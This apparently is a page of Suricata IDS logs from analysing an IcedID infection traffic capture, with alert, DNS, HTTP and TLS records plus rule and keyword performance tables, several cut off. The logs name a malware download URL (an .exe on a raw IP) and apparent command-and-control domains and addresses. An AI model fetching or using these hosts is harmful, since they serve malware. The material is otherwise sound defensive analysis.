{"timestamp":"2018-12-17T15:20:24.174859+0000","flow_id":2191686356098050,"pcap_cnt":114,"event_type":"alert","src_ip":"209.141.61.249","src_port":80,"dest_ip":"10.12.17.101","dest_port":49172,"proto":"TCP","app_proto":"http","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2021076,"rev":2,"signature":"ET INFO SUSPICIOUS Dotted Quad Host MZ Response","category":"Potentially Bad Traffic","severity":2}}
{"timestamp":"2018-12-17T15:20:24.847830+0000","flow_id":2191686356098050,"pcap_cnt":249,"event_type":"http","src_ip":"10.12.17.101","src_port":49172,"dest_ip":"209.141.61.249","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"209.141.61.249","url":"\/23.exe","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"application\/octet-stream"}}
{"timestamp":"2018-12-17T15:20:29.577074+0000","flow_id":2191686356098050,"pcap_cnt":250,"event_type":"fileinfo","src_ip":"209.141.61.249","src_port":80,"dest_ip":"10.12.17.101","dest_port":49172,"proto":"TCP","http":{"hostname":"209.141.61.249","url":"\/23.exe","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"application\/octet-stream","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":157816},"app_proto":"http","fileinfo":{"filename":"\/23.exe","gaps":false,"state":"CLOSED","stored":false,"size":157816,"tx_id":0}}
{"timestamp":"2018-12-17T15:25:33.062334+0000","flow_id":1574688554611582,"pcap_cnt":254,"event_type":"dns","src_ip":"10.12.17.101","src_port":55640,"dest_ip":"10.12.17.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":19080,"rrname":"foxpartsearch.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-12-17T15:25:50.128687+0000","flow_id":1991485067032239,"pcap_cnt":259,"event_type":"dns","src_ip":"10.12.17.101","src_port":61645,"dest_ip":"10.12.17.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":49594,"rrname":"labadegmc.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-12-17T15:25:50.154684+0000","flow_id":1991485067032239,"pcap_cnt":260,"event_type":"dns","src_ip":"10.12.17.1","src_port":53,"dest_ip":"10.12.17.101","dest_port":61645,"proto":"UDP","dns":{"type":"answer","id":49594,"rcode":"NOERROR","rrname":"labadegmc.com","rrtype":"A","ttl":5,"rdata":"185.223.163.26"}}
{"timestamp":"2018-12-17T15:25:50.925700+0000","flow_id":1696751526243594,"pcap_cnt":267,"event_type":"tls","src_ip":"10.12.17.101","src_port":49173,"dest_ip":"185.223.163.26","dest_port":443,"proto":"TCP","tls":{"subject":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info","issuerdn":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info"}}
{"timestamp":"2018-12-17T15:25:53.385891+0000","flow_id":364551455433404,"pcap_cnt":360,"event_type":"tls","src_ip":"10.12.17.101","src_port":49178,"dest_ip":"185.223.163.26","dest_port":443,"proto":"TCP","tls":{"subject":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info","issuerdn":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info"}}
{"timestamp":"2018-12-17T15:25:53.386656+0000","flow_id":1103135506490806,"pcap_cnt":362,"event_type":"tls","src_ip":"10.12.17.101","src_port":49181,"dest_ip":"185.223.163.26","dest_port":443,"proto":"TCP","tls":{"subject":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info","issuerdn":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info"}}
{"timestamp":"2018-12-17T15:25:53.386773+0000","flow_id":1192466531280198,"pcap_cnt":364,"event_type":"tls","src_ip":"10.12.17.101","src_port":49180,"dest_ip":"185.223.163.26","dest_port":443,"proto":"TCP","tls":{"subject":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info","issuerdn":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info"}}
{"timestamp":"2018-12-17T15:25:53.387288+0000","flow_id":1395489635358437,"pcap_cnt":366,"event_type":"tls","src_ip":"10.12.17.101","src_port":49175,"dest_ip":"185.223.163.26","dest_port":443,"proto":"TCP","tls":{"subject":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info","issuerdn":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info"}}
{"timestamp":"2018-12-17T15:25:53.387650+0000","flow_id":1782912865330056,"pcap_cnt":368,"event_type":"tls","src_ip":"10.12.17.101","src_port":49179,"dest_ip":"185.223.163.26","dest_port":443,"proto":"TCP","tls":{"subject":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info","issuerdn":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info"}}
{"timestamp":"2018-12-17T15:25:53.388064+0000","flow_id":1952495354043112,"pcap_cnt":371,"event_type":"tls","src_ip":"10.12.17.101","src_port":49176,"dest_ip":"185.223.163.26","dest_port":443,"proto":"TCP","tls":{"subject":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info","issuerdn":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info"}}
{"timestamp":"2018-12-17T15:25:53.388172+0000","flow_id":613599429057734,"pcap_cnt":373,"event_type":"tls","src_ip":"10.12.17.101","src_port":49177,"dest_ip":"185.223.163.26","dest_port":443,"proto":"TCP","tls":{"subject":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info","issuerdn":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info"}}
{"timestamp":"2018-12-17T15:26:00.190696+0000","flow_id":919650209163496,"pcap_cnt":1190,"event_type":"dns","src_ip":"10.12.17.101","src_port":57544,"dest_ip":"10.12.17.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":7040,"rrname":"emirpa.host","rrtype":"A","tx_id":0}}
{"timestamp":"2018-12-17T15:26:01.514767+0000","flow_id":919650209163496,"pcap_cnt":1191,"event_type":"dns","src_ip":"10.12.17.1","src_port":53,"dest_ip":"10.12.17.101","dest_port":57544,"proto":"UDP","dns":{"type":"answer","id":7040,"rcode":"NOERROR","rrname":"emirpa.host","rrtype":"A","ttl":5,"rdata":"185.223.163.26"}}
{"timestamp":"2018-12-17T15:30:52.592978+0000","flow_id":2067712166333522,"pcap_cnt":1241,"event_type":"alert","src_ip":"10.12.17.101","src_port":57671,"dest_ip":"10.12.17.1","dest_port":53,"proto":"UDP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2016778,"rev":5,"signature":"ET DNS Query to a *.pw domain - Likely Hostile","category":"Potentially Bad Traffic","severity":2},"app_proto":"dns"}
{"timestamp":"2018-12-17T15:30:52.592978+0000","flow_id":2067712166333522,"pcap_cnt":1241,"event_type":"dns","src_ip":"10.12.17.101","src_port":57671,"dest_ip":"10.12.17.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":2461,"rrname":"seirfa.pw","rrtype":"A","tx_id":0}}
{"timestamp":"2018-12-17T15:30:53.697404+0000","flow_id":2067712166333522,"pcap_cnt":1242,"event_type":"dns","src_ip":"10.12.17.1","src_port":53,"dest_ip":"10.12.17.101","dest_port":57671,"proto":"UDP","dns":{"type":"answer","id":2461,"rcode":"NOERROR","rrname":"seirfa.pw","rrtype":"A","ttl":5,"rdata":"195.69.187.56"}}
{"timestamp":"2018-12-17T15:30:54.330105+0000","flow_id":893717215818950,"pcap_cnt":1249,"event_type":"tls","src_ip":"10.12.17.101","src_port":49183,"dest_ip":"195.69.187.56","dest_port":443,"proto":"TCP","tls":{"subject":"C=US, ST=AZ, O=quart's Lilian's, OU=Shenyang's stillborn, CN=surveys.org","issuerdn":"C=US, ST=AZ, O=quart's Lilian's, OU=Shenyang's stillborn, CN=surveys.org"}}
{"timestamp":"2018-12-17T15:31:00.142808+0000","flow_id":554938785869272,"pcap_cnt":1256,"event_type":"dns","src_ip":"10.12.17.101","src_port":56248,"dest_ip":"10.12.17.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":16266,"rrname":"emirpa.host","rrtype":"A","tx_id":0}}
{"timestamp":"2018-12-17T15:31:01.625303+0000","flow_id":554938785869272,"pcap_cnt":1257,"event_type":"dns","src_ip":"10.12.17.1","src_port":53,"dest_ip":"10.12.17.101","dest_port":56248,"proto":"UDP","dns":{"type":"answer","id":16266,"rcode":"NOERROR","rrname":"emirpa.host","rrtype":"A","ttl":5,"rdata":"185.223.163.26"}}
{"timestamp":"2018-12-17T15:31:02.297537+0000","flow_id":1272825389619754,"pcap_cnt":1264,"event_type":"tls","src_ip":"10.12.17.101","src_port":49184,"dest_ip":"185.223.163.26","dest_port":443,"proto":"TCP","tls":{"subject":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info","issuerdn":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info"}}
{"timestamp":"2018-12-17T15:35:58.089083+0000","flow_id":2096174934678523,"pcap_cnt":1310,"event_type":"alert","src_ip":"10.12.17.101","src_port":56493,"dest_ip":"10.12.17.1","dest_port":53,"proto":"UDP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2016778,"rev":5,"signature":"ET DNS Query to a *.pw domain - Likely Hostile","category":"Potentially Bad Traffic","severity":2},"app_proto":"dns"}
{"timestamp":"2018-12-17T15:35:58.089083+0000","flow_id":2096174934678523,"pcap_cnt":1310,"event_type":"dns","src_ip":"10.12.17.101","src_port":56493,"dest_ip":"10.12.17.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":38184,"rrname":"seirfa.pw","rrtype":"A","tx_id":0}}
{"timestamp":"2018-12-17T15:35:58.378464+0000","flow_id":2096174934678523,"pcap_cnt":1311,"event_type":"dns","src_ip":"10.12.17.1","src_port":53,"dest_ip":"10.12.17.101","dest_port":56493,"proto":"UDP","dns":{"type":"answer","id":38184,"rcode":"NOERROR","rrname":"seirfa.pw","rrtype":"A","ttl":5,"rdata":"195.69.187.56"}}
{"timestamp":"2018-12-17T15:35:59.094588+0000","flow_id":1851293079360041,"pcap_cnt":1318,"event_type":"tls","src_ip":"10.12.17.101","src_port":49185,"dest_ip":"195.69.187.56","dest_port":443,"proto":"TCP","tls":{"subject":"C=US, ST=AZ, O=quart's Lilian's, OU=Shenyang's stillborn, CN=surveys.org","issuerdn":"C=US, ST=AZ, O=quart's Lilian's, OU=Shenyang's stillborn, CN=surveys.org"}}
{"timestamp":"2018-12-17T15:40:59.825334+0000","flow_id":2034623778101238,"pcap_cnt":1361,"event_type":"alert","src_ip":"10.12.17.101","src_port":56054,"dest_ip":"10.12.17.1","dest_port":53,"proto":"UDP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2016778,"rev":5,"signature":"ET DNS Query to a *.pw domain - Likely Hostile","category":"Potentially Bad Traffic","severity":2},"app_proto":"dns"}
{"timestamp":"2018-12-17T15:40:59.825334+0000","flow_id":2034623778101238,"pcap_cnt":1361,"event_type":"dns","src_ip":"10.12.17.101","src_port":56054,"dest_ip":"10.12.17.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":52163,"rrname":"seirfa.pw","rrtype":"A","tx_id":0}}
{"timestamp":"2018-12-17T15:40:59.854382+0000","flow_id":2034623778101238,"pcap_cnt":1362,"event_type":"dns","src_ip":

This file has been truncated. Go here to download in full.


suricata-4.0.0-etpro-all-perf.txt-2019-01-24-T-11-52-53-01242019.1152-2018-12-17-IcedID-from-password-protected-Word-doc.pcap.txt - (68566 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
  --------------------------------------------------------------------------
  Date: 1/24/2019 -- 11:52:53. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        2017552      1        6        19070899     25.49  152      0        16967029    125466.44   0.00        125466.44  
  2        2009028      1        11       4420105      5.91   1        0        4420105     4420105.00  0.00        4420105.00 
  3        2020865      1        3        2692625      3.60   1        0        2692625     2692625.00  0.00        2692625.00 
  4        2809145      1        2        762305       1.02   6        0        239225      127050.83   0.00        127050.83  
  5        2016855      1        2        210532       0.28   1        0        210532      210532.00   0.00        210532.00  
  6        2819664      1        2        1071916      1.43   7        0        172257      153130.86   0.00        153130.86  
  7        2819930      1        2        1069352      1.43   7        0        163831      152764.57   0.00        152764.57  
  8        2012520      1        7        162982       0.22   1        1        162982      162982.00   162982.00   0.00       
  9        2016854      1        3        159003       0.21   1        0        159003      159003.00   0.00        159003.00  
  10       2021586      1        3        1305695      1.75   14       0        136587      93263.93    0.00        93263.93   
  11       2804906      1        3        349505       0.47   4        0        128878      87376.25    0.00        87376.25   
  12       2021432      1        2        1315112      1.76   14       0        119088      93936.57    0.00        93936.57   
  13       2021433      1        2        1262741      1.69   14       0        115836      90195.79    0.00        90195.79   
  14       2816910      1        2        222579       0.30   3        0        115346      74193.00    0.00        74193.00   
  15       2021434      1        2        1249462      1.67   14       0        106796      89247.29    0.00        89247.29   
  16       2019707      1        2        454144       0.61   6        0        106343      75690.67    0.00        75690.67   
  17       2802987      1        5        665735       0.89   11       0        105073      60521.36    0.00        60521.36   
  18       2023476      1        5        1135194      1.52   14       0        102958      81085.29    0.00        81085.29   
  19       2815287      1        3        327881       0.44   6        0        96901       54646.83    0.00        54646.83   
  20       2816909      1        2        202285       0.27   3        0        94159       67428.33    0.00        67428.33   
  21       2802991      1        5        157986       0.21   2        0        91792       78993.00    0.00        78993.00   
  22       2022550      1        16       89061        0.12   1        1        89061       89061.00    89061.00    0.00       
  23       2820605      1        2        309618       0.41   6        0        88743       51603.00    0.00        51603.00   
  24       2803027      1        6        457399       0.61   6        0        87976       76233.17    0.00        76233.17   
  25       2022054      1        3        84476        0.11   1        1        84476       84476.00    84476.00    0.00       
  26       2804157      1        4        83386        0.11   1        0        83386       83386.00    0.00        83386.00   
  27       2814978      1        2        880032       1.18   14       0        83246       62859.43    0.00        62859.43   
  28       2812914      1        4        299247       0.40   5        0        79413       59849.40    0.00        59849.40   
  29       2801930      1        7        402536       0.54   6        0        78857       67089.33    0.00        67089.33   
  30       2804927      1        2        139405       0.19   2        0        78546       69702.50    0.00        69702.50   
  31       2801929      1        7        401553       0.54   6        0        78086       66925.50    0.00        66925.50   
  32       2016537      1        2        2224049      2.97   149      1        77618       14926.50    77618.00    14502.91   
  33       2018005      1        6        600810       0.80   14       0        73223       42915.00    0.00        42915.00   
  34       2814979      1        2        856281       1.14   14       0        72771       61162.93    0.00        61162.93   
  35       2815568      1        2        72430        0.10   1        0        72430       72430.00    0.00        72430.00   
  36       2022535      1        11       657054       0.88   14       0        67776       46932.43    0.00        46932.43   
  37       2804911      1        3        119735       0.16   2        0        67346       59867.50    0.00        59867.50   
  38       2014819      1        3        65231        0.09   1        0        65231       65231.00    0.00        65231.00   
  39       2822213      1        2        719636       0.96   14       0        64870       51402.57    0.00        51402.57   
  40       2804158      1        3        64764        0.09   1        0        64764       64764.00    0.00        64764.00   
  41       2820851      1        5        135468       0.18   3        0        64678       45156.00    0.00        45156.00   
  42       2802044      1        4        64610        0.09   1        0        64610       64610.00    0.00        64610.00   
  43       2802177      1        3        64501        0.09   1        0        64501       64501.00    0.00        64501.00   
  44       2013250      1        3        63725        0.09   1        0        63725       63725.00    0.00        63725.00   
  45       2022197      1        3        82832        0.11   2        0        63577       41416.00    0.00        41416.00   
  46       2008575      1        5        764534       1.02   97       0        63486       7881.79     0.00        7881.79    
  47       2812952      1        2        280379       0.37   5        0        63275       56075.80    0.00        56075.80   
  48       2022942      1        2        62569        0.08   1        0        62569       62569.00    0.00        62569.00   
  49       2016141      1        5        61471        0.08   1        1        61471       61471.00    61471.00    0.00       
  50       2804907      1        3        61195        0.08   1        0        61195       61195.00    0.00        61195.00   
  51       2821839      1        2        86248        0.12   2        0        60762       43124.00    0.00        43124.00   
  52       2803657      1        5        59145        0.08   1        0        59145       59145.00    0.00        59145.00   
  53       2022627      1        12       651250       0.87   14       0        58110       46517.86    0.00        46517.86   
  54       2103158      1        6        181086       0.24   43       0        57856       4211.30     0.00        4211.30    
  55       2812950      1        2        262479       0.35   5        0        57169       52495.80    0.00        52495.80   
  56       2812915      1        4        264173       0.35   5        0        56980       52834.60    0.00        52834.60   
  57       2816940      1        2        160701       0.21   3        0        56218       53567.00    0.00        53567.00   
  58       2018241      1        2        56126        0.08   1        0        56126       56126.00    0.00        56126.00   
  59       2018959      1        3        55363        0.07   1        1        55363       55363.00    55363.00    0.00       
  60       2812951      1        2        260846       0.35   5        0        54538       52169.20    0.00        52169.20   
  61       2023315      1        2        54091        0.07   1        0        54091       54091.00    0.00        54091.00   
  62       2025064      1        5        126098       0.17   3        0        53255       42032.67    0.00        42032.67   
  63       2802043      1        3        52759        0.07   1        0        52759       52759.00    0.00        52759.00   
  64       2023679      1        3        51635        0.07   1        0        51635       51635.00    0.00        51635.00   
  65       2022049      1        3        51324        0.07   1        0        51324       51324.00    0.00        51324.00   
  66       2023671      1        4        51011        0.07   1        0        51011       51011.00    0.00        51011.00   
  67       2022482      1        3        50681        0.07   1        1        50681       50681.00    50681.00    0.00       
  68       2013352      1        4        49823        0.07   1        0        49823       49823.00    0.00        49823.00   
  69       2017190      1        6        47889        0.06   1        0        47889       47889.00    0.00        47889.00   
  70       2809363      1        3        47461        0.06   1        0        47461       47461.00    0.00        47461.00   
  71       2816929      1        4        110301       0.15   3        0        47353       36767.00    0.00        36767.00   
  72       2023672      1        4        47307        0.06   1        0        47307       47307.00    0.00        47307.00   
  73       2022658      1        4        46707        0.06   1        0        46707       46707.00    0.00        46707.00   
  74       2020963      1        2        46644        0.06   1        0        46644       46644.00    0.00        46644.00   
  75       2826256      1        2        108714       0.15   4        0        46083       27178.50    0.00        27178.50   
  76       2014353      1        6        45975        0.06   1        0        45975       45975.00    0.00        45975.00   
  77       2022220      1        2        45966        0.06   1        0        45966       45966.00    0.00        45966.00   
  78       2022339      1        2        45856        0.06   1        0        45856       45856.00    0.00        45856.00   
  79       2800696      1        3        45747        0.06   1        1        45747       45747.00    45747.00    0.00       
  80       2022830      1        2        45348        0.06   1        0        45348       45348.00    0.00        45348.00   
  81       2816665      1        4        44832        0.06   1        0        44832       44832.00    0.00        44832.00   
  82       2022132      1        1        471712       0.63   46       0        44119       10254.61    0.00        10254.61   
  83       2018958      1        18       44091        0.06   1        0        44091       44091.00    0.00        44091.00   
  84       2008438      1        20       43984        0.06   1        0        43984       43984.00    0.00        43984.00   
  85       2022896      1        5        43743        0.06   1        0        43743       43743.00    0.00        43743.00   
  86       2012981      1        5        78678        0.11   2        0        43614       39339.00    0.00        39339.00   
  87       2024650      1        1        358277       0.48   14       0        43593       25591.21    0.00        25591.21   
  88       2009897      1        14       43531        0.06   1        0        43531       43531.00    0.00        43531.00   
  89       2022502      1        4        118228       0.16   3        0        42982       39409.33    0.00        39409.33   
  90       2823858      1        3        42960        0.06   1        0        42960       42960.00    0.00        42960.00   
  91       2009909      1        10       42907        0.06   1        0        42907       42907.00    0.00        42907.00   
  92       2822979      1        3        42631        0.06   1        0        42631       42631.00    0.00        42631.00   
  93       2019714      1        10       42350        0.06   1        0        42350       42350.00    0.00        42350.00   
  94       2816525      1        10       105791       0.14   3        0        41972       35263.67    0.00        35263.67   
  95       2009702      1        5        352397       0.47   23       0        41794       15321.61    0.00        15321.61   
  96       2022901      1        2        41248        0.06   1        0        41248       41248.00    0.00        41248.00   
  97       2811905      1        3        41244        0.06   1        0        41244       41244.00    0.00        41244.00   
  98       2013441      1        9        40860        0.05   1        0        40860       40860.00    0.00        40860.00   
  99       2815482      1        6        40833        0.05   1        0        40833       40833.00    0.00        40833.00   
  100      2020606      1        4        40597        0.05   1        0        40597       40597.00    0.00        40597.00   
  101      2816165      1        5        103871       0.14   4        0        40196       25967.75    0.00        25967.75   
  102      2020181      1        8        40083        0.05   1        0        40083       40083.00    0.00        40083.00   
  103      2023670      1        3        39149        0.05   1        1        39149       39149.00    39149.00    0.00       
  104      2022547      1        1        301451       0.40   85       0        39149       3546.48     0.00        3546.48    
  105      2018358      1        7        38617        0.05   1        0        38617       38617.00    0.00        38617.00   
  106      2014471      1        6        38520        0.05   1        0        38520       38520.00    0.00        38520.00   
  107      2819694      1        2        93853        0.13   5        0        38402       18770.60    0.00        18770.60   
  108      2021954      1        2        37967        0.05   1        1        37967       37967.00    37967.00    0.00       
  109      2816327      1        4        105350       0.14   3        0        37774       35116.67    0.00        35116.67   
  110      2804508      1        2        37708        0.05   1        0        37708       37708.00    0.00        37708.00   
  111      2815156      1        2        37530        0.05   1        0        37530       37530.00    0.00        37530.00   
  112      2022051      1        2        37404        0.05   1        1        37404       37404.00    37404.00    0.00       
  113      2805985      1        2        37368        0.05   1        0        37368       37368.00    0.00        37368.00   
  114      2024829      1        2        187887       0.25   8        0        37296       23485.88    0.00        23485.88   
  115      2021718      1        4        37243        0.05   1        0        37243       37243.00    0.00        37243.00   
  116      2023875      1        2        37098        0.05   1        0        37098       37098.00    0.00        37098.00   
  117      2816895      1        2        37037        0.05   1        0        37037       37037.00    0.00        37037.00   
  118      2024771      1        1        796021       1.06   157      0        36711       5070.20     0.00        5070.20    
  119      2828122      1        2        36434        0.05   1        0        36434       36434.00    0.00        36434.00   
  120      2816660      1        3        36287        0.05   1        0        36287       36287.00    0.00        36287.00   
  121      2827575      1        2        95443        0.13   3        0        36217       31814.33    0.00        31814.33   
  122      2016029      1        3        36166        0.05   1        0        36166       36166.00    0.00        36166.00   
  123      2022270      1        2        36110        0.05   1        0        36110       36110.00    0.00        36110.00   
  124      2821471      1        2        36107        0.05   1        0        36107       36107.00    0.00        36107.00   
  125      2021068      1        2        3

This file has been truncated. Go here to download in full.


keyword_perf.log - (18061 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
  --------------------------------------------------------------------------------------------------------------------------------
  Date: 1/24/2019 -- 11:52:53
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             3022221         983             983             33423           3074.00         3074.00         0.00           
  content          15911557        2530            1140            2556849         6289.00         5844.00         6654.00        
  pcre             1206471         276             117             33782           4371.00         4113.00         4561.00        
  byte_test        556700          178             81              21038           3127.00         3502.00         2814.00        
  byte_jump        4487973         32              25              4371548         140249.00       177679.00       6570.00        
  isdataat         27822           10              1               2883            2782.00         2883.00         2771.00        
  flowbits         840800          285             50              20787           2950.00         3104.00         2917.00        
  urilen           290142          91              22              4592            3188.00         3279.00         3159.00        
  byte_extract     225789          81              56              4054            2787.00         2807.00         2742.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             3022221         983             983             33423           3074.00         3074.00         0.00           
  flowbits         795296          274             39              20787           2902.00         2813.00         2917.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet/stream payload
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          7840469         1840            741             111160          4261.00         4569.00         4053.00        
  pcre             477034          140             86              18508           3407.00         3308.00         3564.00        
  byte_test        556700          178             81              21038           3127.00         3502.00         2814.00        
  byte_jump        86650           21              14              25701           4126.00         2904.00         6570.00        
  isdataat         27822           10              1               2883            2782.00         2883.00         2771.00        
  byte_extract     225789          81              56              4054            2787.00         2807.00         2742.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: post-match
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flowbits         45504           11              11              6368            4136.00         4136.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          429827          114             73              5020            3770.00         3847.00         3632.00        
  pcre             321192          55              10              20832           5839.00         5807.00         5846.00        
  urilen           290142          91              22              4592            3188.00         3279.00         3159.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_request_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          6698            2               2               4096            3349.00         3349.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_response_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          7328            2               0               3899            3664.00         0.00            3664.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: file_data
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          6192349         212             84              2556849         29209.00        23761.00        32784.00       
  pcre             176748          45              0               7470            3927.00         0.00            3927.00        
  byte_jump        4401323         11              11              4371548         400120.00       400120.00       0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          946068          223             154             63225           4242.00         4416.00         3854.00        
  pcre             180450          26              13              33782           6940.00         7933.00         5947.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header_names
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          111265          32              24              4549            3477.00         3514.00         3364.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_accept
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          7080            2               2               3678            3540.00         3540.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_accept_enc
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          6738            2               2               3470            3369.00         3369.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_content_type
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          11007           3               2               3997            3669.00         3505.00         3997.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_start
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
